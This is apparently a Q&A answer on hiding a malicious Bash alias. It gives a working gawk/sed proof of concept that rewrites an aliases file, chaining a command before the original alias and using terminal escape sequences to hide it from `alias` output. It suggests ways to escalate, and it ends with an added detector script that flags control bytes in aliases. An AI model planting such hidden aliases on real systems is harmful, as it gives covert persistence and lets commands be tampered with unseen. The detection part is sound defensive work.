Is it possible to hide a malicious alias in Bash on Linux?

Solution 1:

It is possible to do that by appending the existing alias onto the malicious one and using cursor movement to hide it if the alias command is used to display alias definitions. It's not a perfectly foolproof method, but it might go undetected for a while. Piping alias through hd will show you whether there are any escape sequences (cursor movement) in your aliases. Here is a proof of concept for how a malicious command could be inserted into an alias:

alias | gawk 'BEGIN {
        FS = "[ =\047]"
        db = "\\"; sp = db " "; amp = db "&"
        sq = "\047"; bell = "\007"; esc = "\033"
    }
    NR == 3 { len1 = length($2) }
    NR == 4 {
        alias = $2
        orig = gensub(sq, "", "g", substr($0, match($0, "=") + 1))
        orig = gensub(" ", db sp, "g", orig)
    }
    END {
        hide = "$" db sq sp "--" sp db "\r" esc "[J" esc "[A" db "\t"
        for (i = 1; i < len1; i++) { hide = hide esc "[C" }
        cmd = "sed -i s/^alias" sp alias ".*/alias" sp alias "=" db sq "echo" sp db bell db db amp db db amp orig db sq hide db sq "/ aliases"
        system(cmd)
    }'
  • The sed command modifies a file called "aliases" in place - a real script of this type would go for the throat and modify a real script file so the malicious alias would be activated the next time it's executed.
  • The malicious part of this example just rings the terminal bell so you know it's working.
  • The command that is originally aliased will be executed with the contents of hide as an argument, so it's conceivable that you could get an error similar to the one reported in this question. It might be possible to reverse the original and malicious portions to effect this, although this would interfere with arguments being provided to the alias. An attempt is made in the script above to mark the end of arguments with --.
  • Instead of chaining the original and malicious parts with &&, you could pipe one to the next and make the malicious script (represented above by the simple echo command) function as a stdin to stdout pass-through, either to modify the data as it's going across or to hide its existence further by not interfering with other redirection.
  • Another possibility would be to instead include the original alias inside the malicious script which could remove the cursor movement string from the argument list and pass the remainder on to the original.
  • I arbitrarily chose records 3 and 4, more intelligent code could target particular aliases, but they need to be adjacent (or the cursor movement could be made more complex).
  • The hide string could be modified to include different cursor movement and the text of the original alias so the alias command would appear to show the unmodified alias instead of hiding it along with the malicious part.
  • To try it out as written, you need to have at least four active aliases, run this script, then source the resulting file with . aliases. Then you can try to use the affected alias and see what it looks like when you do alias|hd.
  • This could undoubtedly be rewritten a hundred different ways - all better.
  • How realistic is this type of threat? I don't have a clue. But if I can do it...
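The answer's own detection advice is to pipe alias output through hd and look for escape sequences by eye. The following script, added here as an example and not part of the answer above, automates that check: it reads alias definitions on stdin (as produced by `alias`), flags every definition containing a terminal control byte (ESC, CR, BEL and the other C0 controls, plus DEL; tab is deliberately left out because it is harmless in a listing), and prints the offending definition with the control bytes made visible in `cat -v` notation. The sample listing at the bottom is constructed for the demonstration; its third entry carries the same kinds of bytes the proof of concept inserts. The function names and the `--` marker in the sample are assumptions of this example. It needs bash or another POSIX shell plus `grep` and `cat -v`; where `cat -v` is unavailable, `od -c` gives an equivalent view.

```shell
#!/usr/bin/env bash
# Usage: alias | find_hidden_aliases
# Prints one line per suspicious alias, control bytes shown in cat -v notation
# (^[ for ESC, ^M for CR, ^G for BEL). Returns 1 if any were found, else 0.
find_hidden_aliases() {
    # Build the byte-class pattern with printf so it works in plain sh as well
    # as bash: C0 controls 0x01-0x08 and 0x0b-0x1f (tab 0x09 and newline 0x0a
    # are skipped) plus DEL 0x7f.
    pat=$(printf '[\001-\010\013-\037\177]')
    found=0
    while IFS= read -r line || [ -n "$line" ]; do
        # LC_ALL=C so grep matches raw bytes rather than multibyte characters
        if printf '%s\n' "$line" | LC_ALL=C grep -q "$pat"; then
            found=1
            name=${line#alias }
            name=${name%%=*}
            printf 'SUSPICIOUS alias %s: ' "$name"
            printf '%s\n' "$line" | cat -v
        fi
    done
    return "$found"
}

# Constructed sample alias listing (example data, not real output). The third
# entry contains a BEL, a CR, an erase-to-end-of-screen sequence, cursor-up and
# two cursor-right moves, which is what a hidden alias of the kind discussed
# above looks like before the terminal interprets it.
sample_alias_listing() {
    printf '%s\n' "alias ll='ls -l'"
    printf '%s\n' "alias gs='git status'"
    printf "alias ls='echo \a&&ls -- \r\033[J\033[A\033[C\033[C'\n"
}

# Demonstration run; with real aliases use:  alias | find_hidden_aliases
sample_alias_listing | find_hidden_aliases \
    || echo "at least one alias definition contains terminal control bytes"
```

Running the check against a clean listing prints nothing and returns 0, so it can sit in a login script or a periodic audit job and only speak up when a definition carries bytes that a normal alias has no reason to contain.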